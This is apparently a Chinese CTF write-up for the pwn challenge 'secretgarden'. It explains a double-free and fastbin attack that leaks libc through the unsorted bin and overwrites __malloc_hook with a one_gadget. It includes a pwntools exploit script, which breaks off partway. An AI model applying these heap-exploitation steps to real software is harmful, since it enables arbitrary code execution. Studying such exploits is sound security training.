目录
hitcontraining_secretgarden(double free)
这题需要使用double free和fastbin attack,
删除之后指针没有置空,导致可以多次删除
利用思路如下:
- 申请四个flower,其中flower[0]name大小需要在unsorted bin范围内,1和2name大小要在fastbin大小范围之内
- 删除flower[0](此时name进入unsorted bin)并执行clean操作(如果不执行clean, unsorted bin会被切割导致之后无法分配到相同chunk)
- 申请flower,大小与0相同,内容为8*‘a’,此时执行show可以泄露main_arena+0x58地址
- 执行double free:delete(1),delete(2),delete(1),然后申请一个同样大小的flower,内容为malloc_hook-0x23,然后再申请2个同样大小的flower
- 再申请一个同样大小的flower,payload为’a’*(0x13-8) + p64(one_gadget) + p64(realloc+0x10),因为本题所有One_gadget都不能直接使用,需要利用realloc对栈进行调整
Exp:
from pwn import *
from LibcSearcher import *
#r = remote("node3.buuoj.cn", 27261)
r = process("./hitcontraining_secretgarden")
context.log_level = 'debug'
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400EAA
c
''')
elf = ELF("./hitcontraining_secretgarden")
libc = ELF('./libc/libc-2.23.so')
magic = elf.sym['magic']
fakechunk = 0x601ffa
def add(size, content, color):
print r.recvuntil("Your choice : ")
r.sendline('1')
print r.recvuntil("Length of the name :")
r.sendline(str(size))
print r.recvuntil("The name of flower :")
r.send(content)
print r.recvuntil("The color of the flower :")
r.send(color)
def show():
print r.recvuntil("Your choice : ")
r.sendline('2')
def delete(index):
print r.recvuntil("Your choice : ")
r.sendline('3')
print r.recvuntil("Which flower do you want to remove from the garden:")
r.sendline(str(index))
def clean():
print r.recvuntil("Your choice : ")
r.sendline('4')
add(0x98, 'a\n', 'a\n')#0
add(0x68, 'b\n', 'b\n')#1
add(0x68, 'b\n', 'b\n')#2
add(0x68, 'b\n', 'b\n')#3
delete(0)
clean()
add(0x98, 'a' * 8, '1234\n')
show()
r.recvuntil('a'*8)
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 0x58 - 0x10
success("malloc_hook:"+hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base